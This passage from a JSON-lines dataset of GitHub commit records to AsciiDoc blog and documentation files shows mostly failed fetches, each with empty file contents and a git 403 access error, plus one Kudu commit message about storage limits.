returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"39e08b257ae9615d12c0de7965e64c41f486303c","subject":"Update 2017-10-16-Danphe-BaaS.adoc","message":"Update 2017-10-16-Danphe-BaaS.adoc","repos":"Nepal-Blockchain\/danphe-blogs,Nepal-Blockchain\/danphe-blogs,Nepal-Blockchain\/danphe-blogs,Nepal-Blockchain\/danphe-blogs","old_file":"_posts\/2017-10-16-Danphe-BaaS.adoc","new_file":"_posts\/2017-10-16-Danphe-BaaS.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/Nepal-Blockchain\/danphe-blogs.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"d10747c89bb51ef6c7108f51353498eaabc86782","subject":"Update 2018-11-08-A-W-S-Azure.adoc","message":"Update 2018-11-08-A-W-S-Azure.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2018-11-08-A-W-S-Azure.adoc","new_file":"_posts\/2018-11-08-A-W-S-Azure.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"509d35a9b193f231251ed6cfb704281a7cd3b688","subject":"Update 2017-06-11-vimmer1.adoc","message":"Update 2017-06-11-vimmer1.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2017-06-11-vimmer1.adoc","new_file":"_posts\/2017-06-11-vimmer1.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"1858ea5ff25aebcdc93236fa11a8a25c1bf020fc","subject":"Update 2018-2-2-Web-R-T-C.adoc","message":"Update 2018-2-2-Web-R-T-C.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2018-2-2-Web-R-T-C.adoc","new_file":"_posts\/2018-2-2-Web-R-T-C.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"ea5885f9bb8ed587f57001130beb04ce778f460a","subject":"formatting","message":"formatting\n","repos":"cjdb\/cs6771-16s2,cjdb\/cs6771-16s2","old_file":"week02.asciidoc","new_file":"week02.asciidoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/cjdb\/cs6771-16s2.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"0b3c0edf425995927fc9d7de109cd00bb8f76aeb","subject":"Update 2016-02-08-Update-Whats-New-in-Version-040.adoc","message":"Update 2016-02-08-Update-Whats-New-in-Version-040.adoc","repos":"HubPress\/blog.hubpress.io,HubPress\/blog.hubpress.io,luckypoem\/blog.hubpress.io,luckypoem\/blog.hubpress.io,luckypoem\/blog.hubpress.io,HubPress\/blog.hubpress.io,HubPress\/blog.hubpress.io,luckypoem\/blog.hubpress.io","old_file":"_posts\/2016-02-08-Update-Whats-New-in-Version-040.adoc","new_file":"_posts\/2016-02-08-Update-Whats-New-in-Version-040.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/HubPress\/blog.hubpress.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"85d6e66486050b6cdd3dfaa4488e06b19cf4e043","subject":"Update 2016-04-12-Larry-Brigdes-on-Cyber-Security.adoc","message":"Update 2016-04-12-Larry-Brigdes-on-Cyber-Security.adoc","repos":"wattsap\/wattsap.github.io,wattsap\/wattsap.github.io,wattsap\/wattsap.github.io,wattsap\/wattsap.github.io","old_file":"_posts\/2016-04-12-Larry-Brigdes-on-Cyber-Security.adoc","new_file":"_posts\/2016-04-12-Larry-Brigdes-on-Cyber-Security.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/wattsap\/wattsap.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"0ce91141ae6bd797d446dd664c5c0d6c940f41dc","subject":"y2b create post A Charger With Unusual Features...","message":"y2b create post A Charger With Unusual Features...","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2016-06-12-A-Charger-With-Unusual-Features.adoc","new_file":"_posts\/2016-06-12-A-Charger-With-Unusual-Features.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"5c17edfb4d02727e2e910f636d3bbb931bb5cd03","subject":"Update 2016-08-05-Intellij-plugin-to-support-Pony.adoc","message":"Update 2016-08-05-Intellij-plugin-to-support-Pony.adoc","repos":"everydaynormalgeek\/everydaynormalgeek.github.io,everydaynormalgeek\/everydaynormalgeek.github.io,everydaynormalgeek\/everydaynormalgeek.github.io,everydaynormalgeek\/everydaynormalgeek.github.io","old_file":"_posts\/2016-08-05-Intellij-plugin-to-support-Pony.adoc","new_file":"_posts\/2016-08-05-Intellij-plugin-to-support-Pony.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/everydaynormalgeek\/everydaynormalgeek.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"f8602062e2f47d8a3eaa4b75ffb13733fe270713","subject":"Renamed '_posts\/2015-01-01-App-help-page.adoc' to '_posts\/2015-01-01-Apps-Terms-and-Conditions.adoc'","message":"Renamed '_posts\/2015-01-01-App-help-page.adoc' to '_posts\/2015-01-01-Apps-Terms-and-Conditions.adoc'","repos":"brendena\/hubpress.io,brendena\/hubpress.io,brendena\/hubpress.io,brendena\/hubpress.io","old_file":"_posts\/2015-01-01-Apps-Terms-and-Conditions.adoc","new_file":"_posts\/2015-01-01-Apps-Terms-and-Conditions.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/brendena\/hubpress.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"7c81b25786a55314bc6ec94ae78466f339b1273e","subject":"Update 2015-03-02-Le-Temps-et-les-Vetements.adoc","message":"Update 2015-03-02-Le-Temps-et-les-Vetements.adoc","repos":"TeksInHelsinki\/TeksInHelsinki.github.io,TeksInHelsinki\/TeksInHelsinki.github.io,TeksInHelsinki\/TeksInHelsinki.github.io","old_file":"_posts\/2015-03-02-Le-Temps-et-les-Vetements.adoc","new_file":"_posts\/2015-03-02-Le-Temps-et-les-Vetements.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/TeksInHelsinki\/TeksInHelsinki.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"10edc9295ac2e2bdcb134d14036f98913a9a0911","subject":"deref","message":"deref\n","repos":"clojure\/clojure-site","old_file":"content\/news\/2021\/11\/24\/deref.adoc","new_file":"content\/news\/2021\/11\/24\/deref.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/clojure\/clojure-site.git\/': The requested URL returned error: 403\n","license":"epl-1.0","lang":"AsciiDoc"} {"commit":"d7cb03c5547226994e1bc08213cd7c53f24cb8a9","subject":"y2b create post World's Thinnest LTE Phone!","message":"y2b create post World's Thinnest LTE Phone!","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2015-10-05-Worlds-Thinnest-LTE-Phone.adoc","new_file":"_posts\/2015-10-05-Worlds-Thinnest-LTE-Phone.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"513e8dbd69b9ffdcfa186f8b09044af8af2f6f83","subject":"Update 2016-03-19-Bitcoin-comment-ca-marche.adoc","message":"Update 2016-03-19-Bitcoin-comment-ca-marche.adoc","repos":"anwfr\/blog.anw.fr,anwfr\/blog.anw.fr,anwfr\/blog.anw.fr,anwfr\/blog.anw.fr","old_file":"_posts\/2016-03-19-Bitcoin-comment-ca-marche.adoc","new_file":"_posts\/2016-03-19-Bitcoin-comment-ca-marche.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/anwfr\/blog.anw.fr.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"b9369a4ac9d9f6ac3ff37dd08ef85113eda97fb6","subject":"Update 2017-01-22-Customer-Segments-Project.adoc","message":"Update 2017-01-22-Customer-Segments-Project.adoc","repos":"anshu92\/blog,anshu92\/blog,anshu92\/blog,anshu92\/blog","old_file":"_posts\/2017-01-22-Customer-Segments-Project.adoc","new_file":"_posts\/2017-01-22-Customer-Segments-Project.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/anshu92\/blog.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"b9a49b41d08a04c85ba3fe9153a5bb788f1c04a4","subject":"y2b create post THE CRAZIEST HEADPHONES EVER","message":"y2b create post THE CRAZIEST HEADPHONES EVER","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2017-12-21-THECRAZIESTHEADPHONESEVER.adoc","new_file":"_posts\/2017-12-21-THECRAZIESTHEADPHONESEVER.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"0c13fc740e6c324f4437e0a7b5bbca308aaf4dc1","subject":"added README file","message":"added README file\n","repos":"ncollins\/pyquantfi","old_file":"README.asciidoc","new_file":"README.asciidoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/ncollins\/pyquantfi.git\/': The requested URL returned error: 403\n","license":"bsd-3-clause","lang":"AsciiDoc"} {"commit":"4fe63766f18171b6bbdadbaa3187dd01787c9a27","subject":"Updated changelog","message":"Updated changelog\n","repos":"rmuhamedgaliev\/JPS,rmuhamedgaliev\/JPS","old_file":"README.asciidoc","new_file":"README.asciidoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/rmuhamedgaliev\/JPS.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"e7cfa456887fe519290b3409ad1a0dd5c27c82b4","subject":"Update 2016-07-21-2016-07-21.adoc","message":"Update 2016-07-21-2016-07-21.adoc","repos":"tamakinkun\/tamakinkun.github.io,tamakinkun\/tamakinkun.github.io,tamakinkun\/tamakinkun.github.io,tamakinkun\/tamakinkun.github.io","old_file":"_posts\/2016-07-21-2016-07-21.adoc","new_file":"_posts\/2016-07-21-2016-07-21.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/tamakinkun\/tamakinkun.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"4dc16c3eae819050715e418fc9811dafca511aad","subject":"Update 2016-07-26-2016-07-26.adoc","message":"Update 2016-07-26-2016-07-26.adoc","repos":"tamakinkun\/tamakinkun.github.io,tamakinkun\/tamakinkun.github.io,tamakinkun\/tamakinkun.github.io,tamakinkun\/tamakinkun.github.io","old_file":"_posts\/2016-07-26-2016-07-26.adoc","new_file":"_posts\/2016-07-26-2016-07-26.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/tamakinkun\/tamakinkun.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"ac5e854f7821a63e7664c377632e1dac09bf8f19","subject":"Add 1.0.0.Beta02 release blog","message":"Add 1.0.0.Beta02 release blog\n","repos":"liveoak-io\/liveoak.io,liveoak-io\/liveoak.io,liveoak-io\/liveoak.io","old_file":"blog\/2014-12-18-1_0_0_beta02.adoc","new_file":"blog\/2014-12-18-1_0_0_beta02.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/liveoak-io\/liveoak.io.git\/': The requested URL returned error: 403\n","license":"epl-1.0","lang":"AsciiDoc"} {"commit":"d0151a44012d1a926cd3f378dc91609319d294b9","subject":"Better cl","message":"Better cl\n","repos":"oliviercailloux\/java-course,oliviercailloux\/jee,oliviercailloux\/java-course","old_file":"JAX-RS client.adoc","new_file":"JAX-RS client.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/oliviercailloux\/jee.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"fd7819599d17a106e8f2b2e8a6700e2f3df057bb","subject":"Bullets","message":"Bullets\n","repos":"oliviercailloux\/java-course,oliviercailloux\/jee,oliviercailloux\/java-course","old_file":"Dev tools\/Eclipse.adoc","new_file":"Dev tools\/Eclipse.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/oliviercailloux\/jee.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"ab8e6be262119da9a12fef632bafe86483dce8b7","subject":"Update 2016-03-04-New-System.adoc","message":"Update 2016-03-04-New-System.adoc","repos":"nilsonline\/nilsonline.github.io,nilsonline\/nilsonline.github.io,nilsonline\/nilsonline.github.io,nilsonline\/nilsonline.github.io","old_file":"_posts\/2016-03-04-New-System.adoc","new_file":"_posts\/2016-03-04-New-System.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/nilsonline\/nilsonline.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"16057b932ec6b7700a1877164767d1294ef4e4b4","subject":"Added destructuing guide","message":"Added destructuing guide\n","repos":"clojure\/clojure-site","old_file":"content\/guides\/destructuring.adoc","new_file":"content\/guides\/destructuring.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/clojure\/clojure-site.git\/': The requested URL returned error: 403\n","license":"epl-1.0","lang":"AsciiDoc"} {"commit":"e9dcff674283978a97a0b63415db2cba98f81251","subject":"Update 2016-04-05-My-header.adoc","message":"Update 2016-04-05-My-header.adoc","repos":"camilo28\/camilo28.github.io,camilo28\/camilo28.github.io,camilo28\/camilo28.github.io,camilo28\/camilo28.github.io","old_file":"_posts\/2016-04-05-My-header.adoc","new_file":"_posts\/2016-04-05-My-header.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/camilo28\/camilo28.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"d7e5006f4d8536a45a24cf1fc253b3831cfe0e41","subject":"Update 2016-04-05-My-header.adoc","message":"Update 2016-04-05-My-header.adoc","repos":"camilo28\/camilo28.github.io,camilo28\/camilo28.github.io,camilo28\/camilo28.github.io,camilo28\/camilo28.github.io","old_file":"_posts\/2016-04-05-My-header.adoc","new_file":"_posts\/2016-04-05-My-header.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/camilo28\/camilo28.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"07cfe0be871442c680f5fb7741fc2539fae6a73e","subject":"Update 2016-12-23-Larastudy.adoc","message":"Update 2016-12-23-Larastudy.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2016-12-23-Larastudy.adoc","new_file":"_posts\/2016-12-23-Larastudy.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"1bbaf0689787704622643f2df3d83751fb6c7642","subject":"Update 2017-08-23-githooks.adoc","message":"Update 2017-08-23-githooks.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2017-08-23-githooks.adoc","new_file":"_posts\/2017-08-23-githooks.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"29dc94be5c10694be39921d6ee0076fdd347f7cc","subject":"Update 2015-12-02-Open-Medicaments.adoc","message":"Update 2015-12-02-Open-Medicaments.adoc","repos":"Ellixo\/ellixo.github.io,Ellixo\/ellixo.github.io,Ellixo\/ellixo.github.io","old_file":"_posts\/2015-12-02-Open-Medicaments.adoc","new_file":"_posts\/2015-12-02-Open-Medicaments.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/Ellixo\/ellixo.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"9e2ab372af7470c82822d56dba5517a19805d749","subject":"Update 2019-01-31-My-English-Title.adoc","message":"Update 2019-01-31-My-English-Title.adoc","repos":"mrfgl\/blog,mrfgl\/blog,mrfgl\/blog,mrfgl\/blog","old_file":"_posts\/2019-01-31-My-English-Title.adoc","new_file":"_posts\/2019-01-31-My-English-Title.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/mrfgl\/blog.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"31789cabeeccd68a48cd0a1fa1a4e78e0340ba8f","subject":"moved the docs folder to the repo","message":"moved the docs folder to the repo\n","repos":"elastic\/elasticsearch-perl,elastic\/elasticsearch-perl","old_file":"docs\/index.asciidoc","new_file":"docs\/index.asciidoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/elastic\/elasticsearch-perl.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"30172458dde73b9b448679c705c84fcec2e7aa60","subject":"Add the CDK preparation instructions","message":"Add the CDK preparation instructions\n","repos":"redhat-reactive-msa\/redhat-reactive-msa","old_file":"cdk-prepare.adoc","new_file":"cdk-prepare.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/redhat-reactive-msa\/redhat-reactive-msa.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"51e9465cc31ed65f46f3df6fa50b96b18507b486","subject":"Update 2015-10-05-draft.adoc","message":"Update 2015-10-05-draft.adoc","repos":"2wce\/2wce.github.io,2wce\/2wce.github.io,2wce\/2wce.github.io,2wce\/2wce.github.io","old_file":"_posts\/2015-10-05-draft.adoc","new_file":"_posts\/2015-10-05-draft.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/2wce\/2wce.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"fb64294aad7186445fad96712f92f584a3cae39e","subject":"Update 2018-10-09-D3js1.adoc","message":"Update 2018-10-09-D3js1.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2018-10-09-D3js1.adoc","new_file":"_posts\/2018-10-09-D3js1.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"59f3da1abb4efddfa8160aedff93ddb8d187af25","subject":"Update 2017-08-15-Azure-6.adoc","message":"Update 2017-08-15-Azure-6.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2017-08-15-Azure-6.adoc","new_file":"_posts\/2017-08-15-Azure-6.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"97974b4ef98ebfe2010fb8ee03c4a9c6fd587780","subject":"Create Linux.adoc","message":"Create Linux.adoc","repos":"igagis\/morda,igagis\/morda,igagis\/morda","old_file":"wiki\/installation\/Linux.adoc","new_file":"wiki\/installation\/Linux.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/igagis\/morda.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"03a9b9297f9d46df4b3934fd374da048a1666cfd","subject":"Update documentation for CGREEN_NO_FORK","message":"Update documentation for CGREEN_NO_FORK\n","repos":"thoni56\/cgreen,cgreen-devs\/cgreen,cgreen-devs\/cgreen,thoni56\/cgreen,cgreen-devs\/cgreen,thoni56\/cgreen,thoni56\/cgreen,cgreen-devs\/cgreen,thoni56\/cgreen,cgreen-devs\/cgreen","old_file":"doc\/cgreen-guide-en.asciidoc","new_file":"doc\/cgreen-guide-en.asciidoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/thoni56\/cgreen.git\/': The requested URL returned error: 403\n","license":"isc","lang":"AsciiDoc"} {"commit":"99f1fb0dcd712784934155de90e67bf01796354a","subject":"Update 2016-02-16-Wordpress-Needs-To-Die.adoc","message":"Update 2016-02-16-Wordpress-Needs-To-Die.adoc","repos":"jmelfi\/jmelfi.github.io,jmelfi\/jmelfi.github.io,jmelfi\/jmelfi.github.io,jmelfi\/jmelfi.github.io","old_file":"_posts\/2016-02-16-Wordpress-Needs-To-Die.adoc","new_file":"_posts\/2016-02-16-Wordpress-Needs-To-Die.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/jmelfi\/jmelfi.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"127d83d8565456df835a35eeff30d9b856c5e9c6","subject":"Update 2017-02-27-Test-Maven-350-alpha-1.adoc","message":"Update 2017-02-27-Test-Maven-350-alpha-1.adoc","repos":"tcollignon\/tcollignon.github.io,tcollignon\/tcollignon.github.io,tcollignon\/tcollignon.github.io,tcollignon\/tcollignon.github.io","old_file":"_posts\/2017-02-27-Test-Maven-350-alpha-1.adoc","new_file":"_posts\/2017-02-27-Test-Maven-350-alpha-1.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/tcollignon\/tcollignon.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"0e41d4cce5ca96cb08612475f76539f6c8bc58f1","subject":"[docs] Bump the data size and tablets limits","message":"[docs] Bump the data size and tablets limits\n\nSome of the changes that landed in 1.4.0, namely Todd's memory consumption\nand log segments improvements, plus the beginning of Adar's thread consolidation\neffort, make it so that it's easier for Kudu to store more data per node.\n\nSome notes (mostly coming from Adar):\n - Memory consumption now seems to be around 1.5GB \/ TB of data on disk after\n startup for a TPC-H lineitem table.\n - File descriptor consumption is about 2 per log segment plus 1 per log index.\n Tablets with some replication lag will use more segments. To that is added\n the fd cache that defaults to 40% of the configured max fds.\n - Thread usage is about 5 for hot replicas, then 2 when they become cold (new\n 1.4.0 concept that Todd added).\n\nBased on the above, doubling our current limitations of 4TB spread over 1000\ntablets to 8TB spread over 2000 means that:\n - 8TB requires at least 12GB of memory, then some more for the MRS, block cache,\n and scanners (around 256KB per column per scan).\n - 6000 fds are required to spin up 2000 tablets, plus what the fd cache uses.\n - 10k threads are required to just to start Kudu.\n\nChange-Id: Ie60d2c3548c402c6a08db9bb724bc6367db989ca\nReviewed-on: http:\/\/gerrit.cloudera.org:8080\/7503\nReviewed-by: Todd Lipcon <2c763d726a8c2f6afda9be7e0e56a2caa6bb5e6b@apache.org>\nTested-by: Todd Lipcon <2c763d726a8c2f6afda9be7e0e56a2caa6bb5e6b@apache.org>\n","repos":"EvilMcJerkface\/kudu,helifu\/kudu,cloudera\/kudu,cloudera\/kudu,helifu\/kudu,cloudera\/kudu,andrwng\/kudu,InspurUSA\/kudu,helifu\/kudu,EvilMcJerkface\/kudu,andrwng\/kudu,InspurUSA\/kudu,andrwng\/kudu,EvilMcJerkface\/kudu,EvilMcJerkface\/kudu,andrwng\/kudu,cloudera\/kudu,andrwng\/kudu,InspurUSA\/kudu,cloudera\/kudu,InspurUSA\/kudu,cloudera\/kudu,InspurUSA\/kudu,EvilMcJerkface\/kudu,cloudera\/kudu,EvilMcJerkface\/kudu,helifu\/kudu,EvilMcJerkface\/kudu,andrwng\/kudu,EvilMcJerkface\/kudu,helifu\/kudu,helifu\/kudu,helifu\/kudu,helifu\/kudu,andrwng\/kudu,andrwng\/kudu,EvilMcJerkface\/kudu,InspurUSA\/kudu,andrwng\/kudu,InspurUSA\/kudu,InspurUSA\/kudu,cloudera\/kudu,helifu\/kudu,InspurUSA\/kudu,cloudera\/kudu","old_file":"docs\/known_issues.adoc","new_file":"docs\/known_issues.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/InspurUSA\/kudu.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"9dd0be5fc6224c0dbc40818e92a1d9f2772dfb85","subject":"loc analyser results in CLI mode","message":"loc analyser results in CLI mode\n","repos":"llaville\/php-reflect,remicollet\/php-reflect","old_file":"docs\/loc_analysis.out.asciidoc","new_file":"docs\/loc_analysis.out.asciidoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/remicollet\/php-reflect.git\/': The requested URL returned error: 403\n","license":"bsd-3-clause","lang":"AsciiDoc"} {"commit":"dff9bfd7db88c7706160e2740f7c04c7de8abd61","subject":"Update 2016-06-29-Docker-for-Magento-how-to-prepare-develop-environment-in-10-senconds.adoc","message":"Update 2016-06-29-Docker-for-Magento-how-to-prepare-develop-environment-in-10-senconds.adoc","repos":"locnh\/locnh.github.io,locnh\/locnh.github.io,locnh\/locnh.github.io,locnh\/locnh.github.io","old_file":"_posts\/2016-06-29-Docker-for-Magento-how-to-prepare-develop-environment-in-10-senconds.adoc","new_file":"_posts\/2016-06-29-Docker-for-Magento-how-to-prepare-develop-environment-in-10-senconds.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/locnh\/locnh.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"567ab313a6a5b66200eb0569d0b19ae1067a4d35","subject":"Renamed '_posts\/2011-01-01-markdown-test-2.adoc' to '_posts\/2011-01-markdown-test-2.adoc'","message":"Renamed '_posts\/2011-01-01-markdown-test-2.adoc' to '_posts\/2011-01-markdown-test-2.adoc'","repos":"rorosaurus\/hubpress.io,rorosaurus\/hubpress.io,rorosaurus\/hubpress.io,rorosaurus\/hubpress.io","old_file":"_posts\/2011-01-markdown-test-2.adoc","new_file":"_posts\/2011-01-markdown-test-2.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/rorosaurus\/hubpress.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"5d5e0c69d7b891b80e9151297ffff9e9cc93afe3","subject":"Update 2019-01-31-how-to-learn.adoc","message":"Update 2019-01-31-how-to-learn.adoc","repos":"lonelee-kirsi\/lonelee-kirsi.github.io,lonelee-kirsi\/lonelee-kirsi.github.io,lonelee-kirsi\/lonelee-kirsi.github.io,lonelee-kirsi\/lonelee-kirsi.github.io","old_file":"_posts\/2019-01-31-how-to-learn.adoc","new_file":"_posts\/2019-01-31-how-to-learn.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/lonelee-kirsi\/lonelee-kirsi.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"3b63744cc41ca25fcca9d3b4f134241878299b03","subject":"Installation guide for Arch Linux.","message":"Installation guide for Arch Linux.\n","repos":"andreatta\/andreatta.github.io","old_file":"install_arch.adoc","new_file":"install_arch.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/andreatta\/andreatta.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"d9e55179f154c2bed0aee076e13c64d103414fae","subject":"[DOCS] Adding index file for GS \"mini book\".","message":"[DOCS] 